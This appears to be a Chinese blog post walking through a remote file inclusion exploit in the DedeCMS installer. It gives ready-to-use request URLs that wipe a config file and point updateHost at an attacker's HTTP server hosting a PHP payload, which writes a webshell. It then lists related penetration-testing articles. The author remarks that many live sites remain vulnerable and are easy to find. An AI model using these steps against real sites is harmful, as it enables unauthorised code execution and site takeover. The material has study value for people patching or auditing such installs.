Web渗透学习-织梦CMS-RFI

原创 2015年07月09日 15:18:19

今天学习了exploit-db上面的一个漏洞,是织梦CMS最新版本的RFI(远程文件包含)。

织梦CMS最新版本的安装文件中仍然采用覆盖变量的方式更新系统,并且存在一些关键变量存储更新系统的路径信息,因此可以通过覆盖变量的方式来获取shell。

大致可以分为三步:


1.清空/data/config_update.php中的信息。

http://127.0.0.1/install/index.php.bak
?step=11
&insLockfile=a
&s_lang=a
&install_demo_name=../data/admin/config_update.php

2.自己开一台服务器,假设是192.168.3.162,在服务器中写一个简单的脚本(但是不能保存成php类型)。

$ifconfig en0
$mkdir "dedecms"
$cd dedecms
$echo "<?php phpinfo();?>" > demodata.a.txt
$python -m SimpleHTTPServer


3.获取shell。

http://127.0.0.1/install/index.php.bak
?step=11
&insLockfile=a
&s_lang=a
&install_demo_name=hello.php
&updateHost=http://192.168.3.162:8000/


接下来可以验证一下,访问hello.php就好。

http://127.0.0.1/install/hello.php




漏洞原理不难,但是想发现还是不容易的。而且这个漏洞仅限于一般用户(因为install属于安装后可以删除的文件夹),但是在实际找的时候还是发现很多网站没有删除。

还没有找真正的网站去试,不过却偶然发现了一个弱口令,希望能获得一枚乌云账号吧~

---------------------------

更新:这个漏洞还是很好找网站的~随便那么一找就找到啦

版权声明:本文为博主原创文章,未经博主允许不得转载。

Web渗透学习路线

Web安全相关概念 熟悉基本概念(SQL注入、上传、XSS、CSRF、一句话木马等)。 通过关键字(SQL注入、上传、XSS、CSRF、一句话木马等)进行Google/SecWiki; 阅读《精...
  • bfboys
  • bfboys
  • 2016年09月09日 10:57
  • 744

Web安全渗透自学

Web 应用程序(Web Applications)是指通过 Web 浏览器访问的任何应用程序。它基于 Web 运行,是典型的浏览器--服务器架构的产物。...
  • CHS007chs
  • CHS007chs
  • 2014年08月14日 09:17
  • 1848

渗透思维导图

  • A13155283231
  • A13155283231
  • 2016年04月16日 14:25
  • 1099

Web渗透测试学习路线图

原文:http://www.zhihu.com/question/21914899 Web安全相关概念 熟悉基本概念(SQL注入、上传、XSS、CSRF、一句话木马等)。 通过关键字...
  • Kyogre6105
  • Kyogre6105
  • 2016年10月12日 13:45
  • 2819

web渗透学习路线

Web安全工程师 Web安全相关概念 熟悉基本概念(SQL注入、上传、XSS、CSRF、一句话木马等)。 通过关键字(SQL注入、上传、XSS、CSRF、一句话木马等...
  • weixin_37212349
  • weixin_37212349
  • 2017年04月23日 16:54
  • 270

WEB渗透学习--经验积累(未完待续)

1.扫描与获取网站后台方法: 可以利用搜索引擎,在google里面输入:site:victim.com 登录(或者'后台'、'系统管理')...
  • gscaiyucheng
  • gscaiyucheng
  • 2013年12月03日 14:51
  • 1619

DedeCMS织梦系统服务器端安装

背景:网站上传到网络上后,经常需要更新一些内容,如果经常重新上传网站会很麻烦,而且对SEO优化非常不好,所以我们就要用到网站管理工具 1.下载安装包,登录织梦官网(www.dedecms.com)或...
  • webxiaoma
  • webxiaoma
  • 2016年12月22日 12:14
  • 1745

渗透学习入门学习之环境搭建,web入门

1、搭建渗透测试学习环境 2003r2最好,win7也行2、各种网站解析环境搭建 Asp解析环境搭建 小旋风 Php解析环境搭建 phpstudy aspx解析环境搭建 jsp解析环境搭建...
  • q1694222672
  • q1694222672
  • 2017年11月21日 00:02
  • 92

dede织梦留言板自定义表单(带验证码)

找到后台-核心-频道模型-自定义表单 2 然后点击增加新的自定义表单 diyid 这个,不管他,默认就好 ...
  • lumengabc
  • lumengabc
  • 2014年04月20日 16:05
  • 1555

织梦模板的使用具体步骤

1、下载最新的织梦dedecms5.7 UTF-8版本。下载网址:http://www.dedecms.com/products/dedecms/downloads/ 2、解压下载的织梦安装包,得到...
  • xiaozhuyirena
  • xiaozhuyirena
  • 2016年08月27日 23:55
  • 1038
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:Web渗透学习-织梦CMS-RFI
举报原因:
原因补充:

(最多只允许输入30个字)